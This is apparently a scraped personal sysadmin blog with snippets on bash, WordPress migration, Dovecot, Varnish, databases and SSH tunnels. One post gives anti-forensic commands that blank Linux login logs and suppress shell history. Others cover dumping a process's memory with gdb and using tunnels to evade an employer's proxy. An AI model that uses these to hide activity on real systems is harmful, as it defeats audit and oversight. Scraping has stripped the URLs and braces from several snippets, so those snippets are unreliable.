How to dump the memory of a process linux

grep rw-p /proc/$1/maps \
| sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \
| while read start stop; do \
gdb --batch --pid $1 -ex \
"dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \

put this in a file (eg. "") and make it executable
usage: ./ [pid]
The output is printed to files with the names: pid-startaddress-stopaddress.dump
Dependencies: gdb

get the pid of your process

pgrep -uroot process

dump the process's memory

mkdir /tmp/process_dump && cd /tmp/process_dump
sh /path/to/ [pid]


Auteur : Harlok

2020-10-16 13:14:39

Some bash programming helpers

how to and expressions if z var e var :

expression1 && expression2 - true if both expression1 and expression2 are true.

if [ ! -z "$var" ] && [ -e "$var" ]; then
echo "'$var' is non-empty and the file exists"

if [[ -n "$var" && -e "$var" ]] ; then
echo "'$var' is non-empty and the file exists"

Subtract two variables in Bash :


How to check if a string contains a substring in Bash :

string='My long string'
if [[ $string == *"My long"* ]]; then
echo "It's there!"

string='My string';
if [[ $string =~ "My" ]]
echo "It's there!"

if grep -q foo <<<"$string"; then
echo "It's there"

Compare Numbers in Linux Shell Script :

$num1 -eq $num2 check if 1st number is equal to 2nd number
$num1 -ge $num2 checks if 1st number is greater than or equal to 2nd number
$num1 -gt $num2 checks if 1st number is greater than 2nd number
$num1 -le $num2 checks if 1st number is less than or equal to 2nd number
$num1 -lt $num2 checks if 1st number is less than 2nd number
$num1 -ne $num2 checks if 1st number is not equal to 2nd number

Compare Strings in Linux Shell Script :

$var1 = $var2 checks if var1 is the same as string var2
$var1 != $var2 checks if var1 is not the same as var2
$var1 < $var2 checks if var1 is less than var2
$var1 > $var2 checks if var1 is greater than var2
-n $var1 checks if var1 has a length greater than zero
-z $var1 checks if var1 has a length of zero

File comparison in Linux Shell Script

-d $file checks if the file exists and is it’s a directory
-e $file checks if the file exists on system
-w $file checks if the file exists on system and if it is writable
-r $file checks if the file exists on system and it is readable
-s $file checks if the file exists on system and it is not empty
-f $file checks if the file exists on system and it is a file
-O $file checks if the file exists on system and if it’s is owned by the current user
-G $file checks if the file exists and the default group is the same as the current user
-x $file checks if the file exists on system and is executable
$fileA -nt $fileB checks if file A is newer than file B
$fileA -ot $fileB checks if file A is older than file B

Auteur : Harlok

2020-10-16 13:22:18

Switching domain name on a wordpress

Switching WordPress Database

First, you need to create a new MySQL database on the new server and then perform the task of exporting old MySQL database from the old server to new database on the new server. You can modify all WordPress site URL’s in the MySQL database tables using PHPMyAdmin. Here are the steps to follow

Old URL –

New URL –

Log into your PHPMyAdmin profile
Select the database you would like to edit
Execute the following SQL queries

#main replace
UPDATE wp_options SET option_value = replace(option_value, ‘’, ‘’) WHERE option_name = ‘home’ OR option_name = ‘siteurl’;

# replace www and non-ssl
UPDATE wp_posts SET guid = replace(guid, ‘’,’’);
UPDATE wp_posts SET post_content = replace(post_content, ‘’, ‘’);
UPDATE wp_postmeta SET meta_value = replace(meta_value,’’,’’);
UPDATE wp_options SET option_value = replace(option_value, ‘’, ‘’) WHERE option_name = ‘home’ OR option_name = ‘siteurl’;
#replace www & SSL
UPDATE wp_posts SET guid = replace(guid, ‘’,’’);
UPDATE wp_posts SET post_content = replace(post_content, ‘’, ‘’);
UPDATE wp_postmeta SET meta_value = replace(meta_value,’’,’’);
UPDATE wp_options SET option_value = replace(option_value, ‘’, ‘’) WHERE option_name = ‘home’ OR option_name = ‘siteurl’;
#replace non-www
UPDATE wp_posts SET guid = replace(guid, ‘’,’’);
UPDATE wp_posts SET post_content = replace(post_content, ‘’, ‘’);
UPDATE wp_postmeta SET meta_value = replace(meta_value,’’,’’);
UPDATE wp_options SET option_value = replace(option_value, ‘’, ‘’) WHERE option_name = ‘home’ OR option_name = ‘siteurl’;
#replace non-www and SSL
UPDATE wp_posts SET guid = replace(guid, ‘’,’’);
UPDATE wp_posts SET post_content = replace(post_content, ‘’, ‘’);
UPDATE wp_postmeta SET meta_value = replace(meta_value,’’,’’);

– Once you have modified the URL’s and table prefix, you can run the SQL query by pressing the Go button at the bottom.

The next step is updating your WordPress config file (wp-config.php) to reflect the above changes. The configuration file should be in your web document root. You need to change the username, password database name, and host values. Here are the steps to follow.

Updating your wp-config.php file

Using your hosting account editor, open your wp-config.php file.
Add two lines to the file which defines the new location of your website.

Locate for a section that looks like this

define(‘DB_NAME’, ‘yourdbnamehere’);

/** MySQL database username */

define(‘DB_USER’, ”usernamehere’);

/** MySQL database password */

define(‘DB_PASSWORD’, ‘passwordhere’);

/** MySQL hostname */

define(‘DB_HOST’, ‘localhost’);

Note – enter the database information from your database as follows

yourdbnamehere= your MySQL database name
usernamehere is your MySQL Database Name
yourpasswordhere is your MySQL Password
localhost is your MySQL Host Name

Save modifications to wp-config.php file


Auteur : Harlok

2020-10-15 18:53:40

Mail server master/master replication with SSL using dovecot

Dovecot master/master replication using dsync.

Configuration with SSL

Make sure that user listing is configured for your userdb, this is required by replication to find the list of users that are periodically replicated:

doveadm user '*'
this command must list all users.

I) Enable the replication plugin globally most likely you'll need to do this in 10-mail.conf :
mail_plugins = $mail_plugins notify replication

II) Then in conf.d/30-dsync.conf :

service aggregator {
fifo_listener replication-notify-fifo {
user = vmail
unix_listener replication-notify {
user = vmail

service replicator {
process_min_avail = 1
unix_listener replicator-doveadm {
mode = 0600
user = vmail

replication_max_conns = 10

service doveadm {
user = vmail
inet_listener {
# port to listen on
port = $port
# enable SSL
ssl = yes

doveadm_port = $port
doveadm_password = "$password"
#same password on the other

plugin {
mail_replica = tcps:$targethostname:$port
#be sure to use the same name as the one provided for the ssl cert.

service config {
unix_listener config {
user = vmail

III) In conf.d/10-ssl.conf :
ssl = yes
ssl_cert = </etc/ssl/certs/chain.domain.crt
ssl_key = </etc/ssl/private/private.domain.key
ssl_client_ca_dir = /etc/ssl/certs/

IV) service dovecot restart
V) Do the same for the other master and replace $targethostname by the 1st one you configured

VI) If configuration is done well, run the following to check the status of syncing,
doveadm replicator status '*'
You should see the syncing is on progress.

doveadm replicator command :

Replicate a given email account manually
doveadm replicator replicate 'email'
Replicate a given email account manually IN FULL
doveadm replicator replicate -f 'email'
Check replication status. Also works without the email parameter.
doveadm replicator status 'email'
In case if you have duplicates (use with care) :
doveadm deduplicate -u -m ALL

Auteur : Harlok

2020-07-05 02:32:31

Cryptpad the online private Office tools

Bye bye google docs, Welcome privacy !

I'll show you in this article an alternative to google docs : cryptpad.

In your entreprise you don't wan't your employee to share your documentation with someone external.
But many of them will use google docs if you don't deploy an alternative solution.
So google have access to all your informations.

Here come cryptpad ! it has word processing, sheets, code, kanban, presentation, whiteboard and even a drive !

The best of all, it is open source, actively maintained, and ... have client end encryption, more documentation here !

It's easily deployed in containers or in standard installation with node.
It's not providing anonymity but it's got a lot of qualities.

I'm using it since more than 1 year it's tested and approuved.
Here is my cryptpad instance

Auteur : Harlok

2020-06-17 19:20:07

Haproxy SSH

When you setup a proxy for SSH the configuration is slightly different than for HTTP:

maxconn 10000

timeout connect 500s
timeout client 5000s
timeout server 1h

frontend ssh1
bind *:2021
default_backend ssh1
timeout client 1h

frontend ssh2
bind *:2022
default_backend ssh2
timeout client 1h

backend ssh1
mode tcp
server ssh

backend ssh2
mode tcp
server ssh

Auteur : Harlok

2020-03-20 09:41:34

MySQL Basic Commands

Connection :
mysql -u root -p

create database `example`;

create user 'user'@'localhost' identified by "password";

grant all privileges on `example` . * to 'user'@'localhost';

flush privileges;

show databases;

Auteur : Harlok

2020-02-05 18:15:56

Varnish commands and wordpress vcl

Test VCL compilation :
varnishd -C -f /etc/varnish/yourvcl.vcl

Check log :
varnishlog -q 'RespStatus == 503' -g request

Wordpress vcl 4.0 :
vcl 4.0;
# Based on:

import std;
import directors;

backend server1 { # Define one backend
.host = ""; # IP or Hostname of backend
.port = "80"; # Port Apache or whatever is listening
.max_connections = 300; # That's it

.probe = {
#.url = "/"; # short easy way (GET /)
# We prefer to only do a HEAD /
.request =
"HEAD / HTTP/1.1"
"Host: localhost"
"Connection: close"
"User-Agent: Varnish Health Probe";

.interval = 5s; # check the health of each backend every 5 seconds
.timeout = 1s; # timing out after 1 second.
.window = 5; # If 3 out of the last 5 polls succeeded the backend is considered healthy, otherwise it will be marked as sick
.threshold = 3;

.first_byte_timeout = 300s; # How long to wait before we receive a first byte from our backend?
.connect_timeout = 5s; # How long to wait for a backend connection?
.between_bytes_timeout = 2s; # How long to wait between bytes received from our backend?

acl purge {
# ACL we'll use later to allow purges

acl editors {
# ACL to honor the "Cache-Control: no-cache" header to force a refresh but only from selected IPs

sub vcl_init {
# Called when VCL is loaded, before any requests pass through it.
# Typically used to initialize VMODs.

new vdir = directors.round_robin();
# vdir.add_backend(server...);
# vdir.add_backend(servern);

sub vcl_recv {
# Called at the beginning of a request, after the complete request has been received and parsed.
# Its purpose is to decide whether or not to serve the request, how to do it, and, if applicable,
# which backend to use.
# also used to modify the request

set req.backend_hint = vdir.backend(); # send all traffic to the vdir director

# Normalize the header, remove the port (in case you're testing this on various TCP ports)
set req.http.Host = regsub(req.http.Host, ":[0-9]+", "");

# Remove the proxy header (see
unset req.http.proxy;

# Normalize the query arguments
set req.url = std.querysort(req.url);

# Allow purging
if (req.method == "PURGE") {
if (!client.ip ~ purge) { # purge is the ACL defined at the begining
# Not from an allowed IP? Then die with an error.
return (synth(405, "This IP is not allowed to send PURGE requests."));
# If you got this stage (and didn't error out above), purge the cached result
return (purge);

# Only deal with "normal" types
if (req.method != "GET" &&
req.method != "HEAD" &&
req.method != "PUT" &&
req.method != "POST" &&
req.method != "TRACE" &&
req.method != "OPTIONS" &&
req.method != "PATCH" &&
req.method != "DELETE") {
/* Non-RFC2616 or CONNECT which is weird. */
/*Why send the packet upstream, while the visitor is using a non-valid HTTP method? */
return (synth(404, "Non-valid HTTP method!"));

# Implementing websocket support (
if (req.http.Upgrade ~ "(?i)websocket") {
return (pipe);

# Only cache GET or HEAD requests. This makes sure the POST requests are always passed.
if (req.method != "GET" && req.method != "HEAD") {
return (pass);

# Some generic URL manipulation, useful for all templates that follow
# First remove URL parameters used to track effectiveness of online marketing campaigns
if (req.url ~ "(\?|&)(utm_[a-z]+|gclid|cx|ie|cof|siteurl|fbclid)=") {
set req.url = regsuball(req.url, "(utm_[a-z]+|gclid|cx|ie|cof|siteurl|fbclid)=[-_A-z0-9+()%.]+&?", "");
set req.url = regsub(req.url, "[?|&]+$", "");

# Strip hash, server doesn't need it.
if (req.url ~ "\#") {
set req.url = regsub(req.url, "\#.*$", "");

# Strip a trailing ? if it exists
if (req.url ~ "\?$") {
set req.url = regsub(req.url, "\?$", "");

# Some generic cookie manipulation, useful for all templates that follow
# Remove the "has_js" cookie
set req.http.Cookie = regsuball(req.http.Cookie, "has_js=[^;]+(; )?", "");

# Remove any Google Analytics based cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__utm.=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "_ga=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "_gat=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmctr=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmcmd.=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmccn.=[^;]+(; )?", "");

# Remove DoubleClick offensive cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__gads=[^;]+(; )?", "");

# Remove the Quant Capital cookies (added by some plugin, all __qca)
set req.http.Cookie = regsuball(req.http.Cookie, "__qc.=[^;]+(; )?", "");

# Remove the AddThis cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__atuv.=[^;]+(; )?", "");

# Remove a ";" prefix in the cookie if present
set req.http.Cookie = regsuball(req.http.Cookie, "^;\s*", "");

# Are there cookies left with only spaces or that are empty?
if (req.http.cookie ~ "^\s*$") {
unset req.http.cookie;

#if (req.http.Cache-Control ~ "(?i)no-cache") {
#if (req.http.Cache-Control ~ "(?i)no-cache" && client.ip ~ editors) { # create the acl editors if you want to restrict the Ctrl-F5
# Ignore requests via proxy caches and badly behaved crawlers
# like msnbot that send no-cache with every request.
# if (! (req.http.Via || req.http.User-Agent ~ "(?i)bot" || req.http.X-Purge)) {
# #set req.hash_always_miss = true; # Doesn't seems to refresh the object in the cache
# return (purge); # Couple this with restart in vcl_purge and X-Purge header to avoid loops
# }

# Large static files are delivered directly to the end-user without
# waiting for Varnish to fully read the file first.
# Varnish 4 fully supports Streaming, so set do_stream in vcl_backend_response()
if (req.url ~ "^[^?]*\.(7z|avi|bz2|flac|flv|gz|mka|mkv|mov|mp3|mp4|mpeg|mpg|ogg|ogm|opus|rar|tar|tgz|tbz|txz|wav|webm|xz|zip)(\?.*)?$") {
unset req.http.Cookie;
return (hash);

# Remove all cookies for static files
# A valid discussion could be held on this line: do you really need to cache static files that don't cause load? Only if you have memory left.
# Sure, there's disk I/O, but chances are your OS will already have these files in their buffers (thus memory).
# Before you blindly enable this, have a read here:
if (req.url ~ "^[^?]*\.(7z|avi|bmp|bz2|css|csv|doc|docx|eot|flac|flv|gif|gz|ico|jpeg|jpg|js|less|mka|mkv|mov|mp3|mp4|mpeg|mpg|odt|otf|ogg|ogm|opus|pdf|png|ppt|pptx|rar|rtf|svg|svgz|swf|tar|tbz|tgz|ttf|txt|txz|wav|webm|webp|woff|woff2|xls|xlsx|xml|xz|zip)(\?.*)?$") {
unset req.http.Cookie;
return (hash);

# Send Surrogate-Capability headers to announce ESI support to backend
set req.http.Surrogate-Capability = "key=ESI/1.0";

if (req.http.Authorization) {
# Not cacheable by default
return (pass);

return (hash);

sub vcl_pipe {
# Called upon entering pipe mode.
# In this mode, the request is passed on to the backend, and any further data from both the client
# and backend is passed on unaltered until either end closes the connection. Basically, Varnish will
# degrade into a simple TCP proxy, shuffling bytes back and forth. For a connection in pipe mode,
# no other VCL subroutine will ever get called after vcl_pipe.

# Note that only the first request to the backend will have
# X-Forwarded-For set. If you use X-Forwarded-For and want to
# have it set for all requests, make sure to have:
# set bereq.http.connection = "close";
# here. It is not set by default as it might break some broken web
# applications, like IIS with NTLM authentication.

# set bereq.http.Connection = "Close";

# Implementing websocket support (
if (req.http.upgrade) {
set bereq.http.upgrade = req.http.upgrade;

return (pipe);

sub vcl_pass {
# Called upon entering pass mode. In this mode, the request is passed on to the backend, and the
# backend's response is passed on to the client, but is not entered into the cache. Subsequent
# requests submitted over the same client connection are handled normally.

# return (pass);

# The data on which the hashing will take place
sub vcl_hash {
# Called after vcl_recv to create a hash value for the request. This is used as a key
# to look up the object in Varnish.


if ( {
} else {

# hash cookies for requests that have them
if (req.http.Cookie) {

sub vcl_hit {
# Called when a cache lookup is successful.

if (obj.ttl >= 0s) {
# A pure unadultered hit, deliver it
return (deliver);

# When several clients are requesting the same page Varnish will send one request to the backend and place the others on hold while fetching one copy from the backend. In some products this is called request coalescing and Varnish does this automatically.
# If you are serving thousands of hits per second the queue of waiting requests can get huge. There are two potential problems - one is a thundering herd problem - suddenly releasing a thousand threads to serve content might send the load sky high. Secondly - nobody likes to wait. To deal with this we can instruct Varnish to keep the objects in cache beyond their TTL and to serve the waiting requests somewhat stale content.

# if (!std.healthy(req.backend_hint) && (obj.ttl + obj.grace > 0s)) {
# return (deliver);
# } else {
# return (miss);
# }

# We have no fresh fish. Lets look at the stale ones.
if (std.healthy(req.backend_hint)) {
# Backend is healthy. Limit age to 10s.
if (obj.ttl + 10s > 0s) {
#set req.http.grace = "normal(limited)";
return (deliver);
} else {
# No candidate for grace. Fetch a fresh object.
return (fetch);
} else {
# backend is sick - use full grace
if (obj.ttl + obj.grace > 0s) {
#set req.http.grace = "full";
return (deliver);
} else {
# no graced object.
return (fetch);

# fetch & deliver once we get the result
return (fetch); # Dead code, keep as a safeguard

sub vcl_miss {
# Called after a cache lookup if the requested document was not found in the cache. Its purpose
# is to decide whether or not to attempt to retrieve the document from the backend, and which
# backend to use.

return (fetch);

# Handle the HTTP request coming from our backend
sub vcl_backend_response {
# Called after the response headers has been successfully retrieved from the backend.

# Pause ESI request and remove Surrogate-Control header
if (beresp.http.Surrogate-Control ~ "ESI/1.0") {
unset beresp.http.Surrogate-Control;
set beresp.do_esi = true;

# Enable cache for all static files
# The same argument as the static caches from above: monitor your cache size, if you get data nuked out of it, consider giving up the static file cache.
# Before you blindly enable this, have a read here:
if (bereq.url ~ "^[^?]*\.(7z|avi|bmp|bz2|css|csv|doc|docx|eot|flac|flv|gif|gz|ico|jpeg|jpg|js|less|mka|mkv|mov|mp3|mp4|mpeg|mpg|odt|otf|ogg|ogm|opus|pdf|png|ppt|pptx|rar|rtf|svg|svgz|swf|tar|tbz|tgz|ttf|txt|txz|wav|webm|webp|woff|woff2|xls|xlsx|xml|xz|zip)(\?.*)?$") {
unset beresp.http.set-cookie;

# Large static files are delivered directly to the end-user without
# waiting for Varnish to fully read the file first.
# Varnish 4 fully supports Streaming, so use streaming here to avoid locking.
if (bereq.url ~ "^[^?]*\.(7z|avi|bz2|flac|flv|gz|mka|mkv|mov|mp3|mp4|mpeg|mpg|ogg|ogm|opus|rar|tar|tgz|tbz|txz|wav|webm|xz|zip)(\?.*)?$") {
unset beresp.http.set-cookie;
set beresp.do_stream = true; # Check memory usage it'll grow in fetch_chunksize blocks (128k by default) if the backend doesn't send a Content-Length header, so only enable it for big objects

# Sometimes, a 301 or 302 redirect formed via Apache's mod_rewrite can mess with the HTTP port that is being passed along.
# This often happens with simple rewrite rules in a scenario where Varnish runs on :80 and Apache on :8080 on the same box.
# A redirect can then often redirect the end-user to a URL on :8080, where it should be :80.
# This may need finetuning on your setup.
# To prevent accidental replace, we only filter the 301/302 redirects for now.
if (beresp.status == 301 || beresp.status == 302) {
set beresp.http.Location = regsub(beresp.http.Location, ":[0-9]+", "");

# Don't cache 50x responses
if (beresp.status == 500 || beresp.status == 502 || beresp.status == 503 || beresp.status == 504) {
return (abandon);

# Set 2min cache if unset for static files
if (beresp.ttl <= 0s || beresp.http.Set-Cookie || beresp.http.Vary == "*") {
set beresp.ttl = 120s; # Important, you shouldn't rely on this, SET YOUR HEADERS in the backend
set beresp.uncacheable = true;
return (deliver);

# Allow stale content, in case the backend goes down.
# make Varnish keep all objects for 6 hours beyond their TTL
set beresp.grace = 6h;

return (deliver);

# The routine when we deliver the HTTP request to the user
# Last chance to modify headers that are sent to the client
sub vcl_deliver {
# Called before a cached object is delivered to the client.

if (obj.hits > 0) { # Add debug header to see if it's a HIT/MISS and the number of hits, disable when not needed
set resp.http.X-Cache = "HIT";
} else {
set resp.http.X-Cache = "MISS";

# Please note that obj.hits behaviour changed in 4.0, now it counts per objecthead, not per object
# and obj.hits may not be reset in some cases where bans are in use. See bug 1492 for details.
# So take hits with a grain of salt
set resp.http.X-Cache-Hits = obj.hits;

# Remove some headers: PHP version
unset resp.http.X-Powered-By;

# Remove some headers: Apache version & OS
unset resp.http.Server;
unset resp.http.X-Drupal-Cache;
unset resp.http.X-Varnish;
unset resp.http.Via;
unset resp.http.Link;
unset resp.http.X-Generator;

return (deliver);

sub vcl_purge {
# Only handle actual PURGE HTTP methods, everything else is discarded
if (req.method == "PURGE") {
# restart request
set req.http.X-Purge = "Yes";
return (restart);

sub vcl_synth {
if (resp.status == 720) {
# We use this special error status 720 to force redirects with 301 (permanent) redirects
# To use this, call the following from anywhere in vcl_recv: return (synth(720, "http://host/new.html"));
set resp.http.Location = resp.reason;
set resp.status = 301;
return (deliver);
} elseif (resp.status == 721) {
# And we use error status 721 to force redirects with a 302 (temporary) redirect
# To use this, call the following from anywhere in vcl_recv: return (synth(720, "http://host/new.html"));
set resp.http.Location = resp.reason;
set resp.status = 302;
return (deliver);

return (deliver);

sub vcl_fini {
# Called when VCL is discarded only after all requests have exited the VCL.
# Typically used to clean up VMODs.

return (ok);

Thanks Mattias Geniar

Auteur : Harlok

2020-10-16 09:09:38

PostgreSQL Command

Connecting :
# su – postgres

Connect to database :
$ psql
\c databasename
Describe :
help :
Exit :

Creating Roles
Now the PostgreSQL allows access to database based on roles, they are similar to ‘users’ in Linux system. Also we can create a set of roles, which is similar to ‘groups’ in Linux & based on these roles, a user’s access is determined. A role created will be applied globally & we don’t have to create it again for another database on the same server.

To create a role, first connect to database & then we will use command ‘createuser’:
postgres=# CREATE USER test;

Or we can also use the following,
postgres=# CREATE ROLE test

To create a user with password,
$ CREATE USER test PASSWORD ‘enter password here’

Check all roles
postgres=# \du

Delete a role
postgres=# DROP ROLE test;

Create a new Database
postgres=# CREATE DATABASE sysa;

Delete a database
postgres=# DROP DATABASE sysa;

List all database
postgres=# \l
postgres=# \list

Connect to a database
$ sudo -i -u test

than connect to database the following command,
$ psql -d sysa

Change to another database
Once connected to a database, we can also switch to another database without having to repeat the whole process of loggin into user & than connecting to different different database. We use the following command,
sysa=> \connect new_database

Create Table
To create a table, first connect to the desired database where the table is to be created. Next create table with the command,
sysa=> CREATE TABLE USERS (Serial_No int, First_Name varchar, Last_Name varchar);

Now insert some records into it,
sysa=> INSERT INTO USERS VALUES (1, ‘Dan’, ‘Prince’);

Check the tables database
& it will produce all the inserted data from the table USERS.

Delete a table

List all the tables in a database
sysa=> \dt

Adding a column to a table
sysa=> ALTER TABLE USERS ADD date_of_birth date;

Updating a Row
sysa=> UPDATE USERS SET date_of_birth = ‘05-09-1999’ WHERE Seriel_No = ‘1’;

Remove a Column
sysa=> ALTER TABLE USERS DROP date_of_birth;

Remove a Row
sysa=> DELETE FROM USERS WHERE Seriel_No = ‘1’;

sanitized from linuxtechlabs

Auteur : Harlok

2020-01-24 11:40:15

cat << EOF

Examples of cat <<EOF syntax usage in Bash:

Some rules about the Here tags:

The tag can be any string, uppercase or lowercase, though most people use uppercase by convention.
The tag will not be considered as a Here tag if there are other words in that line. In this case, it will merely be considered part of the string. The tag should be by itself on a separate line, to be considered a tag.
The tag should have no leading or trailing spaces in that line to be considered a tag. Otherwise it will be considered as part of the string.

1. Assign multi-line string to a shell variable

$ sql=$(cat <<EOF
SELECT foo, bar FROM db
WHERE foo='baz'

The $sql variable now holds the new-line characters too. You can verify with echo -e "$sql".
2. Pass multi-line string to a file in Bash

$ cat <<EOF >
echo \$PWD
echo $PWD

The file now contains:

echo $PWD
echo /home/user

3. Pass multi-line string to a pipe in Bash

$ cat <<EOF | grep 'b' | tee b.txt


$ cat >> test <<HERE
> Hello world HERE <-- Not by itself on a separate line -> not considered end of string
> This is a test
> HERE <-- Leading space, so not considered end of string
> and a new line
> HERE <-- Now we have the end of the string


cat <<EOF >>
# Created on $(date # : <<-- this will be evaluated before cat;)
echo "\$HOME will not be evaluated because it is backslash-escaped"

Auteur : Harlok

2019-12-19 13:42:00

How to send a mail with telnet

Here is an example to send a mail via telnet:

Replace with your smtp server.
telnet 25




subject : mail via telnet
this is a telnet mail

It's done

Auteur : Harlok

2019-09-24 11:56:36

MySQL upgrade failed error

While I upgraded a MySQL 8 database to the latest version, I got an error with the sysconfig file in the sys table.

If your unable to start MySQL 8.

Even MySQL repair table was unable to repair the sys table.
You can try it but if it fail, here is the procedure to repair a failed upgrade for MySQL 8.

-Start MySQL

Add upgrade=MINIMAL in my.cnf file cause mysql_upgrade no longer exists.
systemctl start mysqld

- First dump all databases:

mysqldump -u root -p --all-databases > alldb.sql
Look up the documentation for mysqldump. You may want to use some of the options mentioned in comments:
mysqldump -u root -p --opt --all-databases > alldb.sql
mysqldump -u root -p --all-databases --skip-lock-tables
Check if routines & triggers are also saved.

- Stop MySQL:

systemctl stop mysqld

- Remove all the database in the MySQL directory :

rm -rf database/*

- Reinitialise :

Remove upgrade=MINIMAL from my.cnf
mysqld --initialize
Grab the new root password in the log file
cat log/mysqld.log

- Start MySQL

systemctl start mysqld

- Change root password

mysql -u root -p
Enter temporary password
change the root password to the real one:

- Import the databases

mysql -u root -p < alldb.sql

It's done now you've got a clean MySQL 8.

PS: I recommend you to dump your databases before an upgrade.

Auteur : Harlok

2020-01-24 11:40:55

Oh shit, git!

You screwed up with your code go here

Auteur : Harlok

2019-08-07 13:36:01

Logitech wireless hacking

Logitech wireless vulnerabilities

Logitech wireless devices have vulnerabilities and you need to patch your stuff yourself because the constructor doesn't really know which devices is patched !
Here the disclosure and the exploits Github repo.
A little article on zdnet

Tools for exploit

Here a tool for exploit the vulns another one here

Finally the patch

Finally logitech policy is cucumbersome and I don't recommend using logitech wireless devices.
Because the exploit seems to be working from 100 meters according to Mengs and logitech say you should protect access to your devices ?!
here the patch

Auteur : Harlok

2019-07-24 11:32:43

Ransomware victim ? Read this!

Translated from the korben article

I have a mailbox always full and constantly desperate people write to me cause they "catch" a ransomware.

Here's my advice :

  • Take a deep breath

  • Write down the name of the ransomware and keep it somewhere

  • Remove the hard drive from your computer and put it in a box

  • Install a new hard drive

  • Make offline backups of your computer and install an antivirus

  • Finally, take a look from time to time at No More Ransom to see if a file decryptor is available for your ransomware

The decryption tools of the No More Ransom page.
For example the decryptor for GrandCrab (1,5 million of victims) is available.

If you follow this advice and you had kept the cursed disk, it's maybe the time to reclaim what you owned.

Auteur : Harlok

2019-06-18 16:43:48

Linux Display and Set Date From a Command Prompt

Linux Display Current Date and Time

You must login as root user to use date command.

Just type the date command:
$ date

Sample outputs:

Mon Jan 21 01:31:40 IST 2019

Linux Set Date Command Example

Use the following syntax to set new data and time:

date --set="STRING"

For example, set new data to 2 Oct 2006 18:00:00, type the following command as root user:

# date -s "2 OCT 2006 18:00:00"


# date --set="2 OCT 2006 18:00:00"

You can also simplify format using following syntax:

# date +%Y%m%d -s "20081128"

Linux Set Time Examples

To set time use the following syntax:
# date +%T -s "10:13:13"


  • 10: Hour (hh)

  • 13: Minute (mm)

  • 13: Second (ss)

Use %p locale’s equivalent of either AM or PM, enter:

# date +%T%p -s "6:10:30AM"

# date +%T%p -s "12:10:30PM"

Based on this article.

Auteur : Harlok

2019-07-24 14:23:59

How to remove / clean trace and history on linux

Remove login trace :

last /var/log/wtmp Lists successful login/logout history
lastb /var/log/btmp Shows the bad login attempts
lastlog /var/log/lastlog Shows the most recent login
echo > /var/log/wtmp
echo > /var/log/btmp
echo > /var/log/lastlog

Remove history :

Clear Bash history completely :
Type the following command to clear all your Bash history:
history -cw
-c Clear the history list
-w Write out the current history to the history file

Remove a certain line from Bash history :
Type the following command to remove a certain line (e.g. 352) from the Bash history file:
history -dw 352
-d Delete specified line from the history

Clear current session history :
Type the following command to clear the Bash history of the current session only:
history -r

Execute a command without saving it in the Bash history :
Put a space in front of your command and it won’t be saved in the Bash history.

Don’t save commands in Bash history for current session :
Unsetting HISTFILE will cause any commands that you have executed in the current shell session not to be written in your bash_history file upon logout

Change in the current session the path of the history file :
export HISTFILE=/dev/null

Three ways to Remove Only Current Session Bash History and Leave Older History Untouched :
kill -9 $$
unset HISTFILE && exit
history -r && exit

The commands below does not garanted you will left no trace.
Be aware that if you make a program/script listening to a port without hidding it, it can be monitored.
Also commands you type can also be monitored (the shell can be a chroot jail for example) and log can be send via a syslog server and/or admin can be notified so be careful
source 1
source 2

Auteur : Harlok

2020-10-06 14:10:26

Recall argument of previous command

!!:n where n is the 0-based position of the argument you want.
The ! prefix is used to access previous commands.

Other useful commands:
  • !$ - last argument from previous command

  • !^ - first argument (after the program/built-in/script) from previous command

  • $_ - recall the last argument of the previous command.

  • !! - previous command (often pronounced "bang bang")

  • !n - command number n from history

  • !pattern - most recent command matching pattern

  • !!:s/find/replace - last command, substitute find with replace

Also, if you want an arbitrary argument, you can use !!:1, !!:2, etc. (!!:0 is the previous command itself.)

For example:

echo 'one' 'two'
# "one two"
echo !!:2
# "two"

If you know the number given in the history for a particular command, you can pretty much take any argument in that command using following terms.
Use following to take the second argument from the third command in the history,

Use following to take the third argument from the fifth last command in the history,
Using a minus sign, you ask it to traverse from the last command of the history.

Auteur : Harlok

2019-05-13 17:35:15

How to check whether a string contains a substring in JavaScript

ES6 introduced String.prototype.includes:
var string = "foo",
substring = "oo";

includes doesn’t have IE support, though. In an ES5 or older environment, String.prototype.indexOf, which returns −1 when it doesn’t find the substring, can be used instead:
var string = "foo",
substring = "oo";
string.indexOf(substring) !== -1

Note that this does not work in Internet Explorer or some other old browsers with no or incomplete ES6 support. To make it work in old browsers, you may wish to use a transpiler like Babel, a shim library like es6-shim, or this polyfill from MDN:
if (!String.prototype.includes) {
String.prototype.includes = function(search, start) {
'use strict';
if (typeof start !== 'number') {
start = 0;
if (start + search.length > this.length) {
return false;
} else {
return this.indexOf(search, start) !== -1;

Auteur : Harlok

2019-05-11 21:18:45

Change permissions for a folder and all of its subfolders and files Linux

To change all permissions to the same type recursively:
chmod -R 775 /folder
To change all the directories to 755 (drwxr-xr-x):
find /folder -type d -exec chmod 755 {} \;
To change all the files to 644 (-rw-r--r--):
find /folder -type f -exec chmod 644 {} \;

Auteur : Harlok

2019-05-10 16:16:53

SSH Tunneling Explained


A SSH tunnel consists of an encrypted tunnel created through a SSH protocol connection. A SSH tunnel can be used to transfer unencrypted traffic over a network through an encrypted channel. For example we can use a ssh tunnel to securely transfer files between a FTP server and a client even though the FTP protocol itself is not encrypted. SSH tunnels also provide a means to bypass firewalls that prohibits or filter certain internet services. For example an organization will block certain sites using their proxy filter. But users may not wish to have their web traffic
monitored or blocked by the organization proxy filter. If users can connect toan external SSH server, they can create a SSH tunnel to forward a given port on their local machine to port 80 on remote web-server via the external SSH server. I will describe this scenario in detail in a little while.
To set up a SSH tunnel a given port of one machine needs to be forwarded (of which I am going to talk about in a little while) to a port in the other machine which will be the other end of the tunnel. Once the SSH tunnel has been established, the user can connect to earlier specified port at first machine to access the network service.

Port Forwarding

SSH tunnels can be created in several ways using different kinds of port forwardingmechanisms. Ports can be forwarded in three ways.

  1. Local port forwarding

  2. Remote port forwarding

  3. Dynamic port forwarding

